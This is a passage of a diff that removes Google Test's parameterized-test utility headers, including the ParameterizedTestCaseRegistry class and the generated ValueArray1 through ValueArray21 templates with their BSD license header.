-  TestInfoContainer tests_;
-  InstantiationContainer instantiations_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestCaseInfo);
-};  // class ParameterizedTestCaseInfo
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// ParameterizedTestCaseRegistry contains a map of ParameterizedTestCaseInfoBase
-// classes accessed by test case names. TEST_P and INSTANTIATE_TEST_CASE_P
-// macros use it to locate their corresponding ParameterizedTestCaseInfo
-// descriptors.
-class ParameterizedTestCaseRegistry {
- public:
-  ParameterizedTestCaseRegistry() {}
-  ~ParameterizedTestCaseRegistry() {
-    for (TestCaseInfoContainer::iterator it = test_case_infos_.begin();
-         it != test_case_infos_.end(); ++it) {
-      delete *it;
-    }
-  }
-
-  // Looks up or creates and returns a structure containing information about
-  // tests and instantiations of a particular test case.
-  template <class TestCase>
-  ParameterizedTestCaseInfo<TestCase>* GetTestCasePatternHolder(
-      const char* test_case_name,
-      const char* file,
-      int line) {
-    ParameterizedTestCaseInfo<TestCase>* typed_test_info = NULL;
-    for (TestCaseInfoContainer::iterator it = test_case_infos_.begin();
-         it != test_case_infos_.end(); ++it) {
-      if ((*it)->GetTestCaseName() == test_case_name) {
-        if ((*it)->GetTestCaseTypeId() != GetTypeId<TestCase>()) {
-          // Complain about incorrect usage of Google Test facilities
-          // and terminate the program since we cannot guaranty correct
-          // test case setup and tear-down in this case.
-          ReportInvalidTestCaseType(test_case_name,  file, line);
-          posix::Abort();
-        } else {
-          // At this point we are sure that the object we found is of the same
-          // type we are looking for, so we downcast it to that type
-          // without further checks.
-          typed_test_info = CheckedDowncastToActualType<
-              ParameterizedTestCaseInfo<TestCase> >(*it);
-        }
-        break;
-      }
-    }
-    if (typed_test_info == NULL) {
-      typed_test_info = new ParameterizedTestCaseInfo<TestCase>(test_case_name);
-      test_case_infos_.push_back(typed_test_info);
-    }
-    return typed_test_info;
-  }
-  void RegisterTests() {
-    for (TestCaseInfoContainer::iterator it = test_case_infos_.begin();
-         it != test_case_infos_.end(); ++it) {
-      (*it)->RegisterTests();
-    }
-  }
-
- private:
-  typedef ::std::vector<ParameterizedTestCaseInfoBase*> TestCaseInfoContainer;
-
-  TestCaseInfoContainer test_case_infos_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ParameterizedTestCaseRegistry);
-};
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  //  GTEST_HAS_PARAM_TEST
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_H_
-// This file was GENERATED by command:
-//     pump.py gtest-param-util-generated.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: vladl@google.com (Vlad Losev)
-
-// Type and function utilities for implementing parameterized tests.
-// This file is generated by a SCRIPT.  DO NOT EDIT BY HAND!
-//
-// Currently Google Test supports at most 50 arguments in Values,
-// and at most 10 arguments in Combine. Please contact
-// googletestframework@googlegroups.com if you need more.
-// Please note that the number of arguments to Combine is limited
-// by the maximum arity of the implementation of tuple which is
-// currently set at 10.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_GENERATED_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_GENERATED_H_
-
-// scripts/fuse_gtest.py depends on gtest's own header being #included
-// *unconditionally*.  Therefore these #includes cannot be moved
-// inside #if GTEST_HAS_PARAM_TEST.
-
-#if GTEST_HAS_PARAM_TEST
-
-namespace testing {
-
-// Forward declarations of ValuesIn(), which is implemented in
-// include/gtest/gtest-param-test.h.
-template <typename ForwardIterator>
-internal::ParamGenerator<
-  typename ::testing::internal::IteratorTraits<ForwardIterator>::value_type>
-ValuesIn(ForwardIterator begin, ForwardIterator end);
-
-template <typename T, size_t N>
-internal::ParamGenerator<T> ValuesIn(const T (&array)[N]);
-
-template <class Container>
-internal::ParamGenerator<typename Container::value_type> ValuesIn(
-    const Container& container);
-
-namespace internal {
-
-// Used in the Values() function to provide polymorphic capabilities.
-template <typename T1>
-class ValueArray1 {
- public:
-  explicit ValueArray1(T1 v1) : v1_(v1) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const { return ValuesIn(&v1_, &v1_ + 1); }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray1& other);
-
-  const T1 v1_;
-};
-
-template <typename T1, typename T2>
-class ValueArray2 {
- public:
-  ValueArray2(T1 v1, T2 v2) : v1_(v1), v2_(v2) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray2& other);
-
-  const T1 v1_;
-  const T2 v2_;
-};
-
-template <typename T1, typename T2, typename T3>
-class ValueArray3 {
- public:
-  ValueArray3(T1 v1, T2 v2, T3 v3) : v1_(v1), v2_(v2), v3_(v3) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray3& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4>
-class ValueArray4 {
- public:
-  ValueArray4(T1 v1, T2 v2, T3 v3, T4 v4) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray4& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-class ValueArray5 {
- public:
-  ValueArray5(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray5& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-class ValueArray6 {
- public:
-  ValueArray6(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray6& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-class ValueArray7 {
- public:
-  ValueArray7(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray7& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-class ValueArray8 {
- public:
-  ValueArray8(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-      T8 v8) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray8& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-class ValueArray9 {
- public:
-  ValueArray9(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-      T9 v9) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray9& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-class ValueArray10 {
- public:
-  ValueArray10(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray10& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-class ValueArray11 {
- public:
-  ValueArray11(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray11& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-class ValueArray12 {
- public:
-  ValueArray12(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray12& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-class ValueArray13 {
- public:
-  ValueArray13(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
-      v12_(v12), v13_(v13) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray13& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-class ValueArray14 {
- public:
-  ValueArray14(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14) : v1_(v1), v2_(v2), v3_(v3),
-      v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray14& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-class ValueArray15 {
- public:
-  ValueArray15(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15) : v1_(v1), v2_(v2),
-      v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10),
-      v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray15& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-class ValueArray16 {
- public:
-  ValueArray16(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16) : v1_(v1),
-      v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9),
-      v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14), v15_(v15),
-      v16_(v16) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray16& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-class ValueArray17 {
- public:
-  ValueArray17(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16,
-      T17 v17) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray17& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-class ValueArray18 {
- public:
-  ValueArray18(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6), v7_(v7),
-      v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13), v14_(v14),
-      v15_(v15), v16_(v16), v17_(v17), v18_(v18) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray18& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-class ValueArray19 {
- public:
-  ValueArray19(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5), v6_(v6),
-      v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12), v13_(v13),
-      v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18), v19_(v19) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray19& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-class ValueArray20 {
- public:
-  ValueArray20(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20) : v1_(v1), v2_(v2), v3_(v3), v4_(v4), v5_(v5),
-      v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11), v12_(v12),
-      v13_(v13), v14_(v14), v15_(v15), v16_(v16), v17_(v17), v18_(v18),
-      v19_(v19), v20_(v20) {}
-
-  template <typename T>
-  operator ParamGenerator<T>() const {
-    const T array[] = {static_cast<T>(v1_), static_cast<T>(v2_),
-        static_cast<T>(v3_), static_cast<T>(v4_), static_cast<T>(v5_),
-        static_cast<T>(v6_), static_cast<T>(v7_), static_cast<T>(v8_),
-        static_cast<T>(v9_), static_cast<T>(v10_), static_cast<T>(v11_),
-        static_cast<T>(v12_), static_cast<T>(v13_), static_cast<T>(v14_),
-        static_cast<T>(v15_), static_cast<T>(v16_), static_cast<T>(v17_),
-        static_cast<T>(v18_), static_cast<T>(v19_), static_cast<T>(v20_)};
-    return ValuesIn(array);
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const ValueArray20& other);
-
-  const T1 v1_;
-  const T2 v2_;
-  const T3 v3_;
-  const T4 v4_;
-  const T5 v5_;
-  const T6 v6_;
-  const T7 v7_;
-  const T8 v8_;
-  const T9 v9_;
-  const T10 v10_;
-  const T11 v11_;
-  const T12 v12_;
-  const T13 v13_;
-  const T14 v14_;
-  const T15 v15_;
-  const T16 v16_;
-  const T17 v17_;
-  const T18 v18_;
-  const T19 v19_;
-  const T20 v20_;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-class ValueArray21 {
- public:
-  ValueArray21(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-      T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-      T18 v18, T19 v19, T20 v20, T21 v21) : v1_(v1), v2_(v2), v3_(v3), v4_(v4),
-      v5_(v5), v6_(v6), v7_(v7), v8_(v8), v9_(v9), v10_(v10), v11_(v11),
